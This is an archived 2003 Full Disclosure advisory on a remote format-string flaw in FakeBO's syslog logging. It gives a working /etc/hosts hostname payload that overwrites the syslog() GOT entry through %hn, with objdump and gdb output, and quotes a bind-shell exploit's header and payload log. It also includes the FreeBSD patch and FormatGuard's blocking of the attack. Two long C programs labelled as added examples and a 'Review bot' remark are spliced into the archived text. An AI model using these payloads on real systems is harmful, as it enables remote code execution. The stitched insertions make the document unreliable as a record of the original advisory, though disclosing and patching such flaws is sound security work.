Full Disclosure mailing list archives

SRT2003-06-12-1212 - FakeBO syslog() format string issue.


From: KF <dotslash () snosoft com>
Date: Wed, 11 Jun 2003 22:20:31 -0700

http://www.secnetops.biz/research

Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               research () secnetops com
Team Lead Contact                                 kf () secnetops com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-06-12-1212
Product                 : FakeBO server
Version                 : <= 0.4.1
Vendor                  : http://sourceforge.net/projects/fakebo/
Class                   : Remote
Criticality             : Low
Operating System(s)     : *nix, cygwin


High Level Explanation
************************************************************************
High Level Description  : Remote format string issue in syslogprintf()
What to do              : Apply patch or disable syslog in the config


Technical Details
************************************************************************
Proof Of Concept Status : Secure Network Operations does have PoC code
Low Level Description   : 

FakeBO could be considered a novelty program by now; however, in some 
situations it could still be used in a novice honeypot setup. It is also 
possible someone would think it a good way to trick an office buddy who 
had installed the REAL Back Orifice on their PC earlier that week. Someone 
also mentioned the possibility of its being used as a crude backdoor. 

Both Cygwin binaries and Unix source are available from the FakeBO website
at http://cvs.linux.hr/fakebo/. The issue can be triggered in both the 
Linux and Win32 versions. To be exploitable, FakeBO must first be 
configured to log via syslog(), and the target's resolver must hand back a 
hostname containing format directives unmodified. Syslog is turned on in 
fakebo.conf as follows:

# you can set this to 1 if you want to log connections via syslog
# 0 - do not log via syslog
# 1 - log via syslog
# 2 - log via syslog verbosely
logtosyslog 1

Because the stub resolver normally refuses hostnames containing characters 
such as `%', the chances of this bug being actively exploited are slim. The 
resolver behaviour involved is explained at http://pi.cr.yp.to/ and 
http://cr.yp.to/djbdns/idn.html. If your BIND is configured with 
`allow_special all', or /etc/resolv.conf contains `options no-check-names', 
such names get through and you may be exploitable. To show that 
exploitation is possible, /etc/hosts is used as the name source below.

This is the entry in /etc/hosts 
127.0.0.1               ..AAAABBBB%10$x%11$x

Using the console alone we would see this:

04-09-2003 15:37:18 [NB] Connection[#0] from `..AAAABBBB%10$x%11$x' (127.0.0.1) accepted!

In syslog however we get more interesting output. 

Apr  9 15:37:18 vegeta FakeBO: [NB] Connection[#0] from `..AAAABBBB4141414142424242' (127.0.0.1)

The syslog line shows that positional arguments 10 and 11 read back the 
AAAA and BBBB bytes of the hostname itself, so a write through them is 
fully controlled. The following example uses that to overwrite the GOT 
entry for syslog() (the R_386_JUMP_SLOT relocation at 0x08051cd4): the 
hostname carries the two halves of that slot, 0x08051cd6 and 0x08051cd4, 
in place of AAAA and BBBB, and `%10$hn%11$hn' writes the current output 
count as a 16-bit value to each of them. 

[dotslash@vegeta dotslash]$ objdump -R fakebo-0.4.1/fakebo|grep syslog
08051cd4 R_386_JUMP_SLOT   syslog

[root@vegeta dotslash]# echo -e "127.0.0.1 ..\xd6\x1c\x05\x08\xd4\x1c\x05\x08%10\$hn%11\$hn" > /etc/hosts

(gdb) r -c /tmp/fakebo.conf
Starting program: ~/fakebo-0.4.1/fakebo -c /tmp/fakebo.conf
FakeBO  version 0.4.1  Copyright (C) 1998,99 by KoSt
 
Type `~/fakebo-0.4.1/fakebo -a' for details.
 
04-09-2003 19:48:06 FakeBO 0.4.1 started using PID 2591.
04-09-2003 19:48:25 [NB] Connection[#0] from `..??%10$hn%11$hn' (127.0.0.1) accepted!
04-09-2003 19:48:43 [NB][#0] Client disconnected.
 
Program received signal SIGSEGV, Segmentation fault.
0x00240024 in ?? ()

The faulting address is not random. By the time the first %hn is reached, 
syslog() has output the 26-byte prefix "[NB] Connection[#0] from `", the 
two dots and the eight address bytes, 36 bytes in all, and nothing is 
output between the two %hn, so each writes 0x0024 into its half of the GOT 
slot. The next call to syslog() then jumps to 0x00240024. Padding the 
output with width specifiers before each %hn puts a chosen value there 
instead, which is what the exploit below does.

If you wanted to take this simple example to the extreme...

[dotslash@vegeta dotslash]$ head 0x82-fakebo_sux.c
/*
** FakeBO v0.4.1 Proof of Concept exploit
** exploit by "you dong-hun"(Xpl017Elz), <szoahc () hotmail com>.
**
** bash-2.04# ./0x82-fakebo_sux -t1
**  [1] Make format string code.
**  [2] Try localhost NetBUS port.
**  [3] Make bind shellcode.
**  [+] Waiting, execute shell.
**  [*] Executed shell successfully !
**
** Linux testsub 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
** uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys),
** 4(adm),6(disk),10(wheel)
** bash-2.04$
**
*/

While the attack runs, FakeBO's log shows the following: 

** 05-31-2003 18:48:55 FakeBO 0.4.1 started using PID 6996.
** 05-31-2003 18:49:05 [NB] Connection[#0] from `ln%49115x%16$hn%6019x%15$hn' (127.0.0.1) accepted!
** 05-31-2003 18:49:06 [NB](#0):  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@...
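The arithmetic behind the 0x00240024 crash above and behind the exploit's `ln%49115x%16$hn%6019x%15$hn' hostname can be checked with the following C program. It is an added example, not code from the advisory or from FakeBO: it models printf's output counter for a format string that receives no real arguments, adds the field width of each conversion (the reason exploit payloads always give one), and records the low 16 bits of the running count at every %hn. The message prefix and the two hostnames are copied from the log lines in this advisory; the helper names and the assumption that every padded field is emitted at exactly its width are mine.

```c
#include <stdio.h>
#include <string.h>

/*
 * Simulate printf's output counter for a format string that gets no real
 * arguments, which is FakeBO's situation in syslog(LOG_WARNING, buf):
 *  - a literal byte or "%%" adds 1
 *  - a conversion with an explicit width (e.g. "%49115x") adds that width;
 *    the popped value is padded to the field, so the width is exact as long
 *    as it exceeds the value's printed length
 *  - a conversion without a width adds nothing: its length depends on
 *    whatever happens to be on the stack and cannot be predicted, which is
 *    why real payloads never rely on one before a %hn
 *  - "%hn" (or "%n") records the low 16 bits of the count in writes[]
 * Returns the number of %n-family writes found.
 */
int simulate_hn_writes(const char *fmt, unsigned short *writes, int max)
{
    unsigned long count = 0;
    int nw = 0;
    const char *p = fmt;

    while (*p) {
        if (*p != '%') { count++; p++; continue; }
        if (p[1] == '%') { count++; p += 2; continue; }
        p++;                                    /* skip '%' */

        /* positional argument "N$" (glibc extension used by the payloads) */
        const char *q = p;
        while (*q >= '0' && *q <= '9') q++;
        if (*q == '$') p = q + 1;

        while (*p && strchr("-+ #0'", *p)) p++; /* flags */
        unsigned long width = 0;                /* field width */
        while (*p >= '0' && *p <= '9') width = width * 10 + (unsigned long)(*p++ - '0');
        if (*p == '.') { p++; while (*p >= '0' && *p <= '9') p++; } /* precision */
        while (*p && strchr("hlLqjzt", *p)) p++; /* length modifiers */

        if (!*p) break;                         /* dangling '%' */
        if (*p == 'n') {
            if (nw < max) writes[nw] = (unsigned short)(count & 0xffff);
            nw++;
        } else {
            count += width;
        }
        p++;                                    /* conversion character */
    }
    return nw;
}

/* Value the i-th (0-based) %hn would write, or 0 if there is no such write. */
unsigned short nth_hn_value(const char *fmt, int i)
{
    unsigned short w[16];
    int n = simulate_hn_writes(fmt, w, 16);
    return (i >= 0 && i < n && i < 16) ? w[i] : 0;
}

/* Number of %n-family writes in fmt. */
int hn_write_count(const char *fmt)
{
    return simulate_hn_writes(fmt, NULL, 0);
}

/* Constructed from the advisory's log lines: FakeBO's fixed message prefix
 * followed by the hostname the resolver returned. The eight raw bytes are
 * the two halves of the syslog GOT slot, 0x08051cd6 and 0x08051cd4. */
#define PREFIX "[NB] Connection[#0] from `"
const char crash_payload[] = PREFIX "..\xd6\x1c\x05\x08\xd4\x1c\x05\x08%10$hn%11$hn";
const char shell_payload[] = PREFIX "ln%49115x%16$hn%6019x%15$hn";

int main(void)
{
    unsigned short w[4];
    int n = simulate_hn_writes(crash_payload, w, 4);
    printf("hosts payload:   %d writes ->", n);
    for (int i = 0; i < n; i++) printf(" 0x%04x", w[i]);
    printf("\n");
    n = simulate_hn_writes(shell_payload, w, 4);
    printf("exploit payload: %d writes ->", n);
    for (int i = 0; i < n; i++) printf(" 0x%04x", w[i]);
    printf("\n");
    return 0;
}
```

For the /etc/hosts payload the model reports two writes of 0x0024, matching the 0x00240024 fault; for the exploit's hostname it reports 0xbff7 at `%16$hn' and 0xd77a at `%15$hn', the 26-byte prefix plus "ln" plus the two padded fields, which is the shape one expects for a stack address on a 2.2 kernel. The model says nothing about where those writes land: that is decided by what the stack holds at positions 15 and 16 when the exploit runs.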

If, however, the target were an Immunix box (http://www.immunix.org), you 
would see the following: 

[root@Immunity kf]# ./0x82-fakebo_sux -t1
 [1] Make format string code.
 [2] Try localhost NetBUS port.
 [3] Make bind shellcode.
Broken pipe

Note that we did not get a shell: that is FormatGuard at work. It counts 
the conversion directives in the format string against the number of 
arguments the caller actually passed, and refuses the call, logging the 
mismatch, when they disagree. 

fakebo[6467]: ImmunixOS format error - mismatch of 0 in syslog() called by syslogprintf.

Cheers go to the Immunix team for their work on the FormatGuard product. 
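The vulnerable shape of syslogprintf(), the fix the FreeBSD port applies and a FormatGuard-style count check side by side, as an added example rather than code from FakeBO or from Immunix. A vsnprintf()-backed stand-in replaces syslog() so the program runs offline; the message text is FakeBO's, the function names and the guard's wording are assumed for illustration. The hostname "100%%" is chosen because "%%" consumes no stack argument, so the vulnerable path collapses it deterministically, whereas a hostname with %x or %hn would read or write whatever the stack holds in this particular binary.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for syslog(): formats into `out` instead of the log. It carries
 * no format attribute, so the compiler cannot warn about a non-literal
 * format, which is exactly the position syslogprintf() is in. */
static int log_sink(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Vulnerable shape (FakeBO <= 0.4.1): the message is built first, then the
 * finished text, hostname included, is handed to the sink AS the format. */
int syslogprintf_vulnerable(char *out, size_t n, const char *host, const char *ip)
{
    char buf[256];
    snprintf(buf, sizeof buf, "[NB] Connection[#0] from `%s' (%s) accepted!", host, ip);
    return log_sink(out, n, buf);            /* directives inside host are honoured */
}

/* Fixed shape (the FreeBSD port patch): constant format, message as argument. */
int syslogprintf_fixed(char *out, size_t n, const char *host, const char *ip)
{
    char buf[256];
    snprintf(buf, sizeof buf, "[NB] Connection[#0] from `%s' (%s) accepted!", host, ip);
    return log_sink(out, n, "%s", buf);      /* '%' bytes inside host are data */
}

/* Number of conversion specifications in fmt. "%%" is a literal and does not
 * count; positional "N$", flags, width, precision and length modifiers are
 * skipped so that "%10$hn" and "%49115x" each count exactly once. */
int count_directives(const char *fmt)
{
    int n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        while (p[1] && strchr("0123456789$#-+ '.*hlLqjzt", p[1])) p++;
        if (p[1]) { n++; p++; }              /* the conversion character */
    }
    return n;
}

/* FormatGuard-style guard (a re-implementation of the idea, not Immunix's
 * code): the caller states how many arguments it passed, and a format whose
 * directive count differs is refused instead of formatted. */
int guarded_log(char *out, size_t n, int nargs, const char *fmt, ...)
{
    int directives = count_directives(fmt);
    if (directives != nargs) {
        snprintf(out, n, "format error - %d directives, %d arguments", directives, nargs);
        return -1;
    }
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

char scratch[256];   /* shared output buffer */

int main(void)
{
    syslogprintf_vulnerable(scratch, sizeof scratch, "100%%", "127.0.0.1");
    puts(scratch);                            /* ... from `100%' ...  */
    syslogprintf_fixed(scratch, sizeof scratch, "100%%", "127.0.0.1");
    puts(scratch);                            /* ... from `100%%' ... */

    /* The advisory's probe hostname against the guard. */
    const char *evil = "..AAAABBBB%10$x%11$x";
    char buf[256];
    snprintf(buf, sizeof buf, "[NB] Connection[#0] from `%s' (127.0.0.1) accepted!", evil);
    if (guarded_log(scratch, sizeof scratch, 0, buf) < 0)
        puts(scratch);                        /* format error - 2 directives, 0 arguments */
    guarded_log(scratch, sizeof scratch, 1, "%s", buf);   /* accepted: one %s, one argument */
    puts(scratch);
    return 0;
}
```

The guard only works when the count it is given is honest, which is why FormatGuard derives the argument count at compile time through its printf() macros rather than trusting the caller; in new code the "%s", buf form of the fix is both simpler and complete.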

Patch or Workaround: 
Shortly after exploiting this issue on a non-Immunix system I looked around 
to make sure it had not already been published. It turns out that someone 
on the FreeBSD team also noticed it sometime last year and wrote a patch 
for the port. 

Fri Jun 7 01:16:21 2002 UTC (12 months ago) by kris
- Fix a format string vulnerability which appears to be exploitable, and
bump PORTREVISION.

--- misc.c.orig Thu Jun  6 18:11:32 2002
+++ misc.c      Thu Jun  6 18:11:41 2002
@@ -107,7 +107,7 @@

 #ifdef HAVE_OPENLOG
                openlog("FakeBO", LOG_CONS, LOG_USER);
-               syslog(LOG_WARNING, buf);
+               syslog(LOG_WARNING, "%s", buf);
                closelog();
 #else
 #warning "Can't find usable syslog, disabled!"
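Review bot: `syslog(LOG_WARNING, "%s", buf)` is the right fix for this sink; with a constant format the hostname's `%` bytes are plain data. Two things to check alongside it: the same message also goes to the console, so confirm that path passes the built text as an argument rather than as a format (the console lines earlier in this advisory show the directives unexpanded, which suggests it already does), and the `openlog()`/`closelog()` pair wrapped around every single `syslog()` call is needless churn; one `openlog("FakeBO", LOG_CONS, LOG_USER)` at startup would do.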


Vendor Status   : Vlatko Kosturjak aka KoSt was notified about the issue; 
no updates to the SourceForge site or the original home page have been made, 
and a recompiled Cygwin binary is not available from the author at this time. 

Bugtraq URL     : to be assigned 

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research () secnetops com for information on how
to obtain exploit information.

